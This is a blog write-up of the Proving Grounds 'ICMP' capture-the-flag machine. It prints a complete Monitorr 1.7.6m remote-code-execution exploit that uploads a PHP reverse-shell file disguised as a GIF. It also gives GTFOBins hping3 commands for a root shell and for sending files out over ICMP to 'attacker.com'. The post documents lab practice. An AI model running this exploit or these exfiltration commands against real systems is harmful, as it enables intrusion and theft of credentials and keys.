Naveen Jagadeesan

Naveen Jagadeesan

Security Analyst | Security Researcher | CRTP

© 2024

Dark Mode

Proving grounds Play: ICMP
Jul 15, 2023
  • writeup

Proving grounds Play - ICMP CTF writeup.

Walkthrough on Youtube

youtube

NMAP

img

PORT 80 Tech Stack

  • Operating System: Debian
  • Web Technology: Apache, PHP (view-page-source)

Monitorr

img

img

Exploit Code

#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

import requests
import os
import sys

if len (sys.argv) != 4:
	print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
    url = sys.argv[1] + "/assets/php/upload.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}

    data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"

    requests.post(url, headers=headers, data=data)

    print ("A shell script should be uploaded. Now we try to execute it")
    url = sys.argv[1] + "/assets/data/usrimg/she_ll.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    requests.get(url, headers=headers)

Obtaining Reverse Shell

img

Obtained local flag

img

Privilege Escalation

Obtain user

The permission is denied to access the devel folder as current user is not a system user. But as the tip found in the reminder file below.

img

The php file crypt.php inside the devel folder disclosed the SSH password for the user fox.

<?php
echo crypt('BUHNIJMONIBUVCYTTYVGBUHJNI','da');
?>

User access obtained.

img

Root Privilege Escalation

Check the current user sudo permissions.

img

Search for exploit in GTFO bins for hping3

Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo hping3
/bin/sh

The file is continuously sent, adjust the --count parameter or kill the sender when done. Receive on the attacker box with:

sudo hping3 --icmp --listen xxx --dump

RHOST=attacker.com LFILE=file_to_read

sudo hping3 "$RHOST" --icmp --data 500 --sign xxx --file "$LFILE"

Transfering SSH key locally to obtain root access through hping3

ICMP Listener

img

ICMP: Data send

img

ICMP: Data Receive

img

SSH Root User

SSH to the root user using the obtained root SSH key.

img

Root user access and proof.txt obtained

img

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.